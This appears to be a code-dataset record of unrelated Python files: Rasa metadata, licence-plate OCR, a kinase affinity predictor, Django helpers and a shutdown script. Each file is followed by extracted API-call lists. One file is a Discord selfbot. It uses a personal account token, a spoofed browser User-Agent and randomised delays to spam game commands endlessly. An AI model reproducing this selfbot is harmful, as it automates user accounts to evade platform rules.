(1304, 1344), False, 'import os\n'), ((1656, 1698), 'rasa_addons.superagent.SuperAgent', 'SuperAgent', (['domain_path'], {'policies': 'policies'}), '(domain_path, policies=policies)\n', (1666, 1698), False, 'from rasa_addons.superagent import SuperAgent\n'), ((1856, 1889), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': '"""WARN"""'}), "(level='WARN')\n", (1875, 1889), False, 'import logging\n'), ((1929, 1983), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Trains the bot."""'}), "(description='Trains the bot.')\n", (1952, 1983), False, 'import argparse\n'), ((2331, 2342), 'time.time', 'time.time', ([], {}), '()\n', (2340, 2342), False, 'import time\n'), ((1097, 1148), 'os.path.join', 'os.path.join', (['stories_path', '"""aggregated_stories.md"""'], {}), "(stories_path, 'aggregated_stories.md')\n", (1109, 1148), False, 'import os\n'), ((1508, 1540), 'rasa_core.policies.memoization.MemoizationPolicy', 'MemoizationPolicy', ([], {'max_history': '(3)'}), '(max_history=3)\n', (1525, 1540), False, 'from rasa_core.policies.memoization import MemoizationPolicy, AugmentedMemoizationPolicy\n'), ((1591, 1620), 'rasa_core.featurizers.BinarySingleStateFeaturizer', 'BinarySingleStateFeaturizer', ([], {}), '()\n', (1618, 1620), False, 'from rasa_core.featurizers import MaxHistoryTrackerFeaturizer, BinarySingleStateFeaturizer\n'), ((2427, 2438), 'time.time', 'time.time', ([], {}), '()\n', (2436, 2438), False, 'import time\n'), ((1232, 1258), 'rasa_addons.domains_merger.DomainsMerger', 'DomainsMerger', (['domain_path'], {}), '(domain_path)\n', (1245, 1258), False, 'from rasa_addons.domains_merger import DomainsMerger\n')]
|
from colored import fg, attr
import requests
import threading
import time
import random
r = fg(241) # Setup color variables
r2 = fg(255)
b = fg(31)
w = fg(15)
def start():
token = input(f"\n {r2}[{b}?{r2}] Token: ")
channel = input(f" {r2}[{b}?{r2}] Channel Id: ")
def execute_command(command = "", cooldown = 0):
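        # Post the command to the channel forever, sleeping for the cooldown plus random jitter between posts.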
print(f"{r2}[{b}!{r2} Loaded: '{command}' With cooldown of {cooldown} Seconds")
while True:
requests.post(
f"https://discord.com/api/channels/{channel}/messages",
data = {'content': command},
headers = {
'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
'Authorization' : token
}
)
print(f"{r2}[{b}+{r2}] '{command}' Ran successfully")
time.sleep(cooldown + random.randint(2, 10))
commands = {
"pls beg" : 45,
"pls hunt" : 40,
"pls fish" : 40,
"pls daily" : 86400
}
print()
for cmd, cooldown in commands.items():
threading.Thread(target = execute_command, kwargs = {"command" : cmd, "cooldown" : cooldown}).start()
time.sleep(5)
|
[
"threading.Thread",
"random.randint",
"colored.fg",
"time.sleep",
"requests.post"
] |
[((93, 100), 'colored.fg', 'fg', (['(241)'], {}), '(241)\n', (95, 100), False, 'from colored import fg, attr\n'), ((130, 137), 'colored.fg', 'fg', (['(255)'], {}), '(255)\n', (132, 137), False, 'from colored import fg, attr\n'), ((142, 148), 'colored.fg', 'fg', (['(31)'], {}), '(31)\n', (144, 148), False, 'from colored import fg, attr\n'), ((153, 159), 'colored.fg', 'fg', (['(15)'], {}), '(15)\n', (155, 159), False, 'from colored import fg, attr\n'), ((1236, 1249), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1246, 1249), False, 'import time\n'), ((449, 698), 'requests.post', 'requests.post', (['f"""https://discord.com/api/channels/{channel}/messages"""'], {'data': "{'content': command}", 'headers': "{'User-Agent':\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7'\n , 'Authorization': token}"}), "(f'https://discord.com/api/channels/{channel}/messages', data=\n {'content': command}, headers={'User-Agent':\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7'\n , 'Authorization': token})\n", (462, 698), False, 'import requests\n'), ((1126, 1217), 'threading.Thread', 'threading.Thread', ([], {'target': 'execute_command', 'kwargs': "{'command': cmd, 'cooldown': cooldown}"}), "(target=execute_command, kwargs={'command': cmd, 'cooldown':\n cooldown})\n", (1142, 1217), False, 'import threading\n'), ((912, 933), 'random.randint', 'random.randint', (['(2)', '(10)'], {}), '(2, 10)\n', (926, 933), False, 'import random\n')]
|
from __future__ import print_function, absolute_import
# Script to predict (or test) the model using protein (kinase) sequence and SMILE pattern of a compound.
# Usage: python2 get_kinase_pki.py protein_sequence "SMILE_Pattern"
import numpy as np
from pydpi.pypro import PyPro
import pandas as pd
import json
import multiprocessing as mp
import os
import sys
from sklearn.externals import joblib
from utility import FeatureGenerator
#from keras.models import load_model
import pickle
class pKiPred(object):
def __init__(self):
self.model = joblib.load(os.path.join(os.path.dirname(__file__), 'Random_forest_gridsearch_py27.mdl'))
def get_smi_features(self, smiles):
try:
feat_gen = FeatureGenerator(smiles)
features = feat_gen.toTPATF()
return features
except:
return None
def get_features(self, seq, smi):
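        # Concatenate the protein sequence descriptors with the compound's TPATF fingerprint features.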
p = PyPro()
try:
p.ReadProteinSequence(seq)
features = list(p.GetALL().values())
smi_features = self.get_smi_features(smi)
smi_features2 = list(np.array([f for f in smi_features], dtype=np.float32))
total_features = np.array(features+smi_features2)[np.newaxis, :]
# total_features = np.array(smi_features2+features)[np.newaxis, :] # does not work...!
return total_features
except Exception as e:
print(str(e))
return None
def predict(self, seq, smi):
protein_feature = self.get_features(seq, smi)
return self.model.predict(protein_feature)
def main():
seq = "MGCGCSSHPEDDWMENIDVCENCHYPIVPLDGKGTLLIRNGSEVRDPLVTYEGSNPPASPLQDNLVIALHSYEPSHDGDLGFEKGEQLRILEQSGEWWKAQSLTTGQEGFIPFNFVAKANSLEPEPWFFK<KEY>"
smile = "CC(C)Oc1ccc(cc1Cl)c2noc(n2)c3ccc(N[C@H]4CC[C@H](C4)C(=O)O)cc3"
pkipred = pKiPred()
if len(sys.argv) == 1:
print(pkipred.predict(seq, smile))
else:
print(pkipred.predict(sys.argv[1], sys.argv[2]))
if __name__=="__main__":
main()
|
[
"pydpi.pypro.PyPro",
"os.path.dirname",
"utility.FeatureGenerator",
"numpy.array"
] |
[((933, 940), 'pydpi.pypro.PyPro', 'PyPro', ([], {}), '()\n', (938, 940), False, 'from pydpi.pypro import PyPro\n'), ((747, 771), 'utility.FeatureGenerator', 'FeatureGenerator', (['smiles'], {}), '(smiles)\n', (763, 771), False, 'from utility import FeatureGenerator\n'), ((605, 630), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (620, 630), False, 'import os\n'), ((1128, 1181), 'numpy.array', 'np.array', (['[f for f in smi_features]'], {'dtype': 'np.float32'}), '([f for f in smi_features], dtype=np.float32)\n', (1136, 1181), True, 'import numpy as np\n'), ((1217, 1251), 'numpy.array', 'np.array', (['(features + smi_features2)'], {}), '(features + smi_features2)\n', (1225, 1251), True, 'import numpy as np\n')]
|
from keras.models import load_model
from keras.preprocessing import image
import numpy as np
import cv2
from keras.backend import tensorflow_backend as K
import os
import glob
import time
import keras
from matplotlib import pyplot as plt
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K2
#IOU calc
iou_smooth=1.
# Input sizes required for locating the plate with U-Net
img_width, img_height = 256, 256
char_list = ["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","R","S","T","U","V","Y","Z","X","W"]
# Loss function needed for U-Net; computes the loss over the intersecting area
def IOU_calc(y_true, y_pred):
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return 2*(intersection + iou_smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + iou_smooth)
def IOU_calc_loss(y_true, y_pred):
return 1-IOU_calc(y_true, y_pred)
# For ordering the characters on the plate; sorts the characters by their widths
def compareRectWidth(a,b):
return a < b
# Load the U-Net model
model_unet = load_model('../src/gumruk_unetGU002.h5',custom_objects={'IOU_calc_loss': IOU_calc_loss, 'IOU_calc': IOU_calc})
# Load the CNN model, for character recognition
# Input sizes of the CNN model
img_rows, img_cols = 28, 28
batch_size = 128
num_classes = 35
epochs = 12
if K2.image_data_format() == 'channels_first':
input_shape = (1, img_rows, img_cols)
else:
input_shape = (img_rows, img_cols, 1)
model_cnn = Sequential()
model_cnn.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model_cnn.add(Conv2D(64, (3, 3), activation='relu'))
model_cnn.add(MaxPooling2D(pool_size=(2, 2)))
model_cnn.add(Dropout(0.25))
model_cnn.add(Flatten())
model_cnn.add(Dense(128, activation='relu'))
model_cnn.add(Dropout(0.5))
model_cnn.add(Dense(num_classes, activation='softmax'))
model_cnn.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model_cnn.load_weights('../src/mert_cnn.h5')
# Finds the plate with U-Net and returns it; takes an image path as input
def getPlateImage(filepath):
image = cv2.imread(filepath)
plate = image
originalImage = image
    # Prepare the input shape required by the model
image = cv2.resize(image, (256, 256)).astype("float32")
image = np.expand_dims(image, axis=0)
    # The prediction comes back as a binary image
pred = model_unet.predict(image)
pred = pred.reshape((256,256,1))
pred = pred.astype(np.float32)
pred = pred*255
pred = cv2.resize(pred, (originalImage.shape[1], originalImage.shape[0]))
pred=np.uint8(pred)
    # Take the largest white region in the image (the plate location) and crop it
contours, hierarchy = cv2.findContours(pred,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
largestArea = 0
for contour in contours:
tArea = cv2.contourArea(contour)
if tArea > largestArea:
largestArea = tArea
x,y,w,h = cv2.boundingRect(contour)
if largestArea > 0:
plate = originalImage[y:y+h,x:x+w]
else:
print("PLATE COULD NOT FOUND")
return plate
# Takes the plate image and reads the characters from it
def getPlateString(plate):
grayPlate = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)
roiList = []
wList = []
charList = []
retval, binary = cv2.threshold(grayPlate, 30.0, 255.0, cv2.THRESH_BINARY+cv2.THRESH_OTSU)
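    # Otsu thresholding separates the characters from the plate background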
contours,hierarchy = cv2.findContours(binary,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
idx =0
plateStr = []
for cnt in contours:
idx += 1
x,y,w,h = cv2.boundingRect(cnt)
roi=plate[y:y+h,x:x+w]
if w > 15 and h > 30 and w <100 and h< 100:
roiList.append(roi)
wList.append(x)
#cv2.imwrite("/home/utku/Desktop/rois/" + str(idx) +".jpg", roi)
#cv2.waitKey(100)
#predict roi, resize may needed
#roi = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
roi = np.asarray(roi)
roi = np.resize(roi, (28,28))
if K2.image_data_format() == 'channels_first':
roi = roi.reshape(roi.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
roi = roi.reshape(1, img_rows, img_cols, 1)
#roi = np.resize(roi, (28,28,1))
#roi = np.expand_dims(roi, axis=0)
roi = roi/255
pred = model_cnn.predict(roi)
#get index
print("pred: ", pred)
predd = pred[0]
char_idx = np.argmax(predd)
            #char_idx = np.where(predd == 1)  # index of the entry equal to 1
plate_char = char_list[char_idx];
#append result to plateStr, may map the predict to a char(BUT HOW)
plateStr.append(plate_char)
print("plate_char is: ", plate_char)
#break
#sorting from left to right
charList = [x for _,x in sorted(zip(wList,plateStr))]
return charList
#plate = getPlateImage("sampleplate.jpg")
#plateString = getPlateString(plate)
#if 'X' in plateString: plateString.remove('X')
#print("plateString: ", plateString)
|
[
"keras.models.load_model",
"keras.optimizers.Adadelta",
"numpy.resize",
"numpy.argmax",
"keras.backend.tensorflow_backend.flatten",
"cv2.contourArea",
"cv2.cvtColor",
"keras.layers.Flatten",
"cv2.boundingRect",
"keras.layers.MaxPooling2D",
"cv2.resize",
"numpy.uint8",
"keras.layers.Dropout",
"numpy.asarray",
"keras.layers.Conv2D",
"keras.backend.tensorflow_backend.sum",
"keras.backend.image_data_format",
"cv2.threshold",
"numpy.expand_dims",
"cv2.imread",
"keras.layers.Dense",
"keras.models.Sequential",
"cv2.findContours"
] |
[((1228, 1343), 'keras.models.load_model', 'load_model', (['"""../src/gumruk_unetGU002.h5"""'], {'custom_objects': "{'IOU_calc_loss': IOU_calc_loss, 'IOU_calc': IOU_calc}"}), "('../src/gumruk_unetGU002.h5', custom_objects={'IOU_calc_loss':\n IOU_calc_loss, 'IOU_calc': IOU_calc})\n", (1238, 1343), False, 'from keras.models import load_model\n'), ((1643, 1655), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1653, 1655), False, 'from keras.models import Sequential\n'), ((812, 829), 'keras.backend.tensorflow_backend.flatten', 'K.flatten', (['y_true'], {}), '(y_true)\n', (821, 829), True, 'from keras.backend import tensorflow_backend as K\n'), ((842, 859), 'keras.backend.tensorflow_backend.flatten', 'K.flatten', (['y_pred'], {}), '(y_pred)\n', (851, 859), True, 'from keras.backend import tensorflow_backend as K\n'), ((876, 902), 'keras.backend.tensorflow_backend.sum', 'K.sum', (['(y_true_f * y_pred_f)'], {}), '(y_true_f * y_pred_f)\n', (881, 902), True, 'from keras.backend import tensorflow_backend as K\n'), ((1496, 1518), 'keras.backend.image_data_format', 'K2.image_data_format', ([], {}), '()\n', (1516, 1518), True, 'from keras import backend as K2\n'), ((1670, 1744), 'keras.layers.Conv2D', 'Conv2D', (['(32)'], {'kernel_size': '(3, 3)', 'activation': '"""relu"""', 'input_shape': 'input_shape'}), "(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape)\n", (1676, 1744), False, 'from keras.layers import Conv2D, MaxPooling2D\n'), ((1794, 1831), 'keras.layers.Conv2D', 'Conv2D', (['(64)', '(3, 3)'], {'activation': '"""relu"""'}), "(64, (3, 3), activation='relu')\n", (1800, 1831), False, 'from keras.layers import Conv2D, MaxPooling2D\n'), ((1847, 1877), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (1859, 1877), False, 'from keras.layers import Conv2D, MaxPooling2D\n'), ((1893, 1906), 'keras.layers.Dropout', 'Dropout', (['(0.25)'], {}), '(0.25)\n', (1900, 1906), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((1922, 1931), 'keras.layers.Flatten', 'Flatten', ([], {}), '()\n', (1929, 1931), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((1947, 1976), 'keras.layers.Dense', 'Dense', (['(128)'], {'activation': '"""relu"""'}), "(128, activation='relu')\n", (1952, 1976), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((1992, 2004), 'keras.layers.Dropout', 'Dropout', (['(0.5)'], {}), '(0.5)\n', (1999, 2004), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((2020, 2060), 'keras.layers.Dense', 'Dense', (['num_classes'], {'activation': '"""softmax"""'}), "(num_classes, activation='softmax')\n", (2025, 2060), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((2371, 2391), 'cv2.imread', 'cv2.imread', (['filepath'], {}), '(filepath)\n', (2381, 2391), False, 'import cv2\n'), ((2547, 2576), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (2561, 2576), True, 'import numpy as np\n'), ((2740, 2806), 'cv2.resize', 'cv2.resize', (['pred', '(originalImage.shape[1], originalImage.shape[0])'], {}), '(pred, (originalImage.shape[1], originalImage.shape[0]))\n', (2750, 2806), False, 'import cv2\n'), ((2813, 2827), 'numpy.uint8', 'np.uint8', (['pred'], {}), '(pred)\n', (2821, 2827), True, 'import numpy as np\n'), ((2915, 2977), 'cv2.findContours', 'cv2.findContours', (['pred', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(pred, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (2931, 2977), False, 'import cv2\n'), ((3320, 3359), 'cv2.cvtColor', 'cv2.cvtColor', (['plate', 'cv2.COLOR_BGR2GRAY'], {}), '(plate, cv2.COLOR_BGR2GRAY)\n', (3332, 3359), False, 'import cv2\n'), ((3419, 3493), 'cv2.threshold', 'cv2.threshold', (['grayPlate', '(30.0)', '(255.0)', '(cv2.THRESH_BINARY + cv2.THRESH_OTSU)'], {}), '(grayPlate, 30.0, 255.0, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n', (3432, 3493), False, 'import cv2\n'), ((3515, 3579), 'cv2.findContours', 'cv2.findContours', (['binary', 'cv2.RETR_LIST', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(binary, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n', (3531, 3579), False, 'import cv2\n'), ((2149, 2176), 'keras.optimizers.Adadelta', 'keras.optimizers.Adadelta', ([], {}), '()\n', (2174, 2176), False, 'import keras\n'), ((3030, 3054), 'cv2.contourArea', 'cv2.contourArea', (['contour'], {}), '(contour)\n', (3045, 3054), False, 'import cv2\n'), ((3648, 3669), 'cv2.boundingRect', 'cv2.boundingRect', (['cnt'], {}), '(cnt)\n', (3664, 3669), False, 'import cv2\n'), ((2489, 2518), 'cv2.resize', 'cv2.resize', (['image', '(256, 256)'], {}), '(image, (256, 256))\n', (2499, 2518), False, 'import cv2\n'), ((3117, 3142), 'cv2.boundingRect', 'cv2.boundingRect', (['contour'], {}), '(contour)\n', (3133, 3142), False, 'import cv2\n'), ((3966, 3981), 'numpy.asarray', 'np.asarray', (['roi'], {}), '(roi)\n', (3976, 3981), True, 'import numpy as np\n'), ((3991, 4015), 'numpy.resize', 'np.resize', (['roi', '(28, 28)'], {}), '(roi, (28, 28))\n', (4000, 4015), True, 'import numpy as np\n'), ((4428, 4444), 'numpy.argmax', 'np.argmax', (['predd'], {}), '(predd)\n', (4437, 4444), True, 'import numpy as np\n'), ((946, 961), 'keras.backend.tensorflow_backend.sum', 'K.sum', (['y_true_f'], {}), '(y_true_f)\n', (951, 961), True, 'from keras.backend import tensorflow_backend as K\n'), ((964, 979), 'keras.backend.tensorflow_backend.sum', 'K.sum', (['y_pred_f'], {}), '(y_pred_f)\n', (969, 979), True, 'from keras.backend import tensorflow_backend as K\n'), ((4022, 4044), 'keras.backend.image_data_format', 'K2.image_data_format', ([], {}), '()\n', (4042, 4044), True, 'from keras import backend as K2\n')]
|
import random
import string
import time
from django.utils.text import slugify
from urllib.parse import urlparse
from django.db import models
from django.dispatch import receiver
import uuid
# PDF imports
from io import BytesIO
from django.http import HttpResponse
from django.template.loader import get_template
from xhtml2pdf import pisa
import pdfkit
def random_string_generator(size=4, chars=string.ascii_lowercase + string.digits):
"""[Generates random string]
Args:
size (int, optional): [size of string to generate]. Defaults to 4.
chars ([str], optional): [characters to use]. Defaults to string.ascii_lowercase+string.digits.
Returns:
[str]: [Generated random string]
"""
return ''.join(random.choice(chars) for _ in range(size))
def random_number_generator(size=4, chars='1234567890'):
"""[Generates random number]
Args:
size (int, optional): [size of number to generate]. Defaults to 4.
chars (str, optional): [numbers to use]. Defaults to '1234567890'.
Returns:
[str]: [Generated random number]
"""
return ''.join(random.choice(chars) for _ in range(size))
def simple_random_string():
"""[Generates simple random string]
Returns:
[str]: [Generated random string]
"""
timestamp_m = time.strftime("%Y")
timestamp_d = time.strftime("%m")
timestamp_y = time.strftime("%d")
timestamp_now = time.strftime("%H%M%S")
random_str = random_string_generator()
random_num = random_number_generator()
bindings = (
random_str + timestamp_d + random_num + timestamp_now +
timestamp_y + random_num + timestamp_m
)
return bindings
def simple_random_string_with_timestamp(size=None):
"""[Generates random string with timestamp]
Args:
size ([int], optional): [Size of string]. Defaults to None.
Returns:
[str]: [Generated random string]
"""
timestamp_m = time.strftime("%Y")
timestamp_d = time.strftime("%m")
timestamp_y = time.strftime("%d")
random_str = random_string_generator()
random_num = random_number_generator()
bindings = (
random_str + timestamp_d + timestamp_m + timestamp_y + random_num
)
if not size == None:
return bindings[0:size]
return bindings
def unique_slug_generator(instance, field=None, new_slug=None):
"""[Generates unique slug]
Args:
instance ([Model Class instance]): [Django Model class object instance].
field ([Django Model Field], optional): [Django Model Class Field]. Defaults to None.
new_slug ([str], optional): [passed new slug]. Defaults to None.
Returns:
[str]: [Generated unique slug]
"""
if field == None:
field = instance.title
if new_slug is not None:
slug = new_slug
else:
slug = slugify(field[:50])
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
return unique_slug_generator(instance, new_slug=new_slug)
return slug
def url_check(url):
"""[Checks if a provided string is URL or Not]
Args:
url ([str]): [URL String]
Returns:
[bool]: [returns True if provided string is URL, otherwise returns False]
"""
min_attr = ('scheme', 'netloc')
try:
result = urlparse(url)
if all([result.scheme, result.netloc]):
return True
else:
return False
except:
return False
def autoUniqueIdWithField(fieldname):
"""[Generates auto slug integrating model's field value and UUID]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_unique_id(sender, instance, *args, raw=False, **kwargs):
if not raw and not getattr(instance, fieldname):
source = getattr(instance, fieldname)
def generate():
uuid = random_number_generator(size=12)
Klass = instance.__class__
qs_exists = Klass.objects.filter(uuid=uuid).exists()
if qs_exists:
generate()
else:
instance.uuid = uuid
pass
# generate uuid
generate()
return model
return decorator
def autoslugWithFieldAndUUID(fieldname):
"""[Generates auto slug integrating model's field value and UUID]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
source = getattr(instance, fieldname)
try:
slug = slugify(source)[:123] + "-" + str(uuid.uuid4())
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
instance.slug = new_slug
else:
instance.slug = slug
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def autoslugFromField(fieldname):
"""[Generates auto slug from model's field value]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname!r}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
source = getattr(instance, fieldname)
try:
slug = slugify(source)
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
instance.slug = new_slug
else:
instance.slug = slug
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def autoslugFromUUID():
"""[Generates auto slug using UUID]
"""
def decorator(model):
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
try:
instance.slug = str(uuid.uuid4())
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def generate_unique_username_from_email(instance):
"""[Generates unique username from email]
Args:
instance ([model class object instance]): [model class object instance]
Raises:
ValueError: [If found invalid email]
Returns:
[str]: [unique username]
"""
# get email from instance
email = instance.email
if not email:
raise ValueError("Invalid email!")
def generate_username(email):
return email.split("@")[0][:15] + "__" + simple_random_string_with_timestamp(size=5)
generated_username = generate_username(email=email)
Klass = instance.__class__
qs_exists = Klass.objects.filter(username=generated_username).exists()
if qs_exists:
# recursive call
generate_unique_username_from_email(instance=instance)
return generated_username
def render_to_pdf(template_src, context_dict={}):
"""[summary]
Args:
template_src ([str]): [path of html file to render]
context_dict (dict, optional): [additional contexts]. Defaults to {}.
Returns:
[HttpResponse/None]: [Django HttpResponse object or None]
"""
template = get_template(template_src)
html = template.render(context_dict)
result = BytesIO()
pdf = pisa.pisaDocument(BytesIO(html.encode("ISO-8859-1")), result)
if not pdf.err:
return HttpResponse(result.getvalue(), content_type='application/pdf')
return None
def render_template(template_src, context_dict={}):
"""[summary]
Args:
template_src ([str]): [path of html file to render]
context_dict (dict, optional): [additional contexts]. Defaults to {}.
Returns:
[HttpResponse/None]: [Django HttpResponse object or None]
"""
template = get_template(template_src)
html = template.render(context_dict)
return html
def generate_pdf_with_pdfkit(template_src=None, context=None, options=None, css=[], filename="Download.pdf"):
try:
if not options:
options = {
'page-size': 'Letter',
'margin-top': '0.75in',
'margin-right': '0.75in',
'margin-bottom': '0.75in',
'margin-left': '0.75in',
'encoding': "UTF-8",
'custom-header': [
('Accept-Encoding', 'gzip')
],
'cookie': [
('cookie-empty-value', '""')
],
'no-outline': None
}
template = render_template(template_src=template_src, context_dict=context)
pdf = pdfkit.from_string(
template, options=options, css=css
)
response = HttpResponse(pdf, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="' + filename + '"'
return response
except Exception as E:
return HttpResponse(str(E), content_type='text/plain')
|
[
"io.BytesIO",
"uuid.uuid4",
"django.http.HttpResponse",
"django.dispatch.receiver",
"time.strftime",
"random.choice",
"django.utils.text.slugify",
"pdfkit.from_string",
"urllib.parse.urlparse",
"django.template.loader.get_template"
] |
[((1315, 1334), 'time.strftime', 'time.strftime', (['"""%Y"""'], {}), "('%Y')\n", (1328, 1334), False, 'import time\n'), ((1353, 1372), 'time.strftime', 'time.strftime', (['"""%m"""'], {}), "('%m')\n", (1366, 1372), False, 'import time\n'), ((1391, 1410), 'time.strftime', 'time.strftime', (['"""%d"""'], {}), "('%d')\n", (1404, 1410), False, 'import time\n'), ((1431, 1454), 'time.strftime', 'time.strftime', (['"""%H%M%S"""'], {}), "('%H%M%S')\n", (1444, 1454), False, 'import time\n'), ((1957, 1976), 'time.strftime', 'time.strftime', (['"""%Y"""'], {}), "('%Y')\n", (1970, 1976), False, 'import time\n'), ((1995, 2014), 'time.strftime', 'time.strftime', (['"""%m"""'], {}), "('%m')\n", (2008, 2014), False, 'import time\n'), ((2033, 2052), 'time.strftime', 'time.strftime', (['"""%d"""'], {}), "('%d')\n", (2046, 2052), False, 'import time\n'), ((9260, 9286), 'django.template.loader.get_template', 'get_template', (['template_src'], {}), '(template_src)\n', (9272, 9286), False, 'from django.template.loader import get_template\n'), ((9341, 9350), 'io.BytesIO', 'BytesIO', ([], {}), '()\n', (9348, 9350), False, 'from io import BytesIO\n'), ((9860, 9886), 'django.template.loader.get_template', 'get_template', (['template_src'], {}), '(template_src)\n', (9872, 9886), False, 'from django.template.loader import get_template\n'), ((2861, 2880), 'django.utils.text.slugify', 'slugify', (['field[:50]'], {}), '(field[:50])\n', (2868, 2880), False, 'from django.utils.text import slugify\n'), ((3487, 3500), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (3495, 3500), False, 'from urllib.parse import urlparse\n'), ((4063, 4122), 'django.dispatch.receiver', 'receiver', (['models.signals.pre_save'], {'sender': 'model', 'weak': '(False)'}), '(models.signals.pre_save, sender=model, weak=False)\n', (4071, 4122), False, 'from django.dispatch import receiver\n'), ((5266, 5325), 'django.dispatch.receiver', 'receiver', (['models.signals.pre_save'], {'sender': 'model', 'weak': '(False)'}), '(models.signals.pre_save, sender=model, weak=False)\n', (5274, 5325), False, 'from django.dispatch import receiver\n'), ((6604, 6663), 'django.dispatch.receiver', 'receiver', (['models.signals.pre_save'], {'sender': 'model', 'weak': '(False)'}), '(models.signals.pre_save, sender=model, weak=False)\n', (6612, 6663), False, 'from django.dispatch import receiver\n'), ((7692, 7751), 'django.dispatch.receiver', 'receiver', (['models.signals.pre_save'], {'sender': 'model', 'weak': '(False)'}), '(models.signals.pre_save, sender=model, weak=False)\n', (7700, 7751), False, 'from django.dispatch import receiver\n'), ((10718, 10772), 'pdfkit.from_string', 'pdfkit.from_string', (['template'], {'options': 'options', 'css': 'css'}), '(template, options=options, css=css)\n', (10736, 10772), False, 'import pdfkit\n'), ((10823, 10872), 'django.http.HttpResponse', 'HttpResponse', (['pdf'], {'content_type': '"""application/pdf"""'}), "(pdf, content_type='application/pdf')\n", (10835, 10872), False, 'from django.http import HttpResponse\n'), ((743, 763), 'random.choice', 'random.choice', (['chars'], {}), '(chars)\n', (756, 763), False, 'import random\n'), ((1121, 1141), 'random.choice', 'random.choice', (['chars'], {}), '(chars)\n', (1134, 1141), False, 'import random\n'), ((6885, 6900), 'django.utils.text.slugify', 'slugify', (['source'], {}), '(source)\n', (6892, 6900), False, 'from django.utils.text import slugify\n'), ((7932, 7944), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (7942, 7944), False, 'import uuid\n'), ((5581, 5593), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (5591, 5593), False, 'import uuid\n'), ((5547, 5562), 'django.utils.text.slugify', 'slugify', (['source'], {}), '(source)\n', (5554, 5562), False, 'from django.utils.text import slugify\n')]
|
import os
from . import computer
def shutdown():
if computer.os() == "Windows":
os.system("shutdown -s")
elif computer.os() == "Linux":
os.system("shutdown -h")
else:
print("Sistema operacional nao detectado, impossivel executar a operacao desejada")
def reboot():
if computer.os() == "Windows":
os.system("shutdown -r")
elif computer.os() == "Linux":
os.system("shutdown -r")
else:
print("Sistema operacional nao detectado, impossivel executar a operacao desejada")
|
[
"os.system"
] |
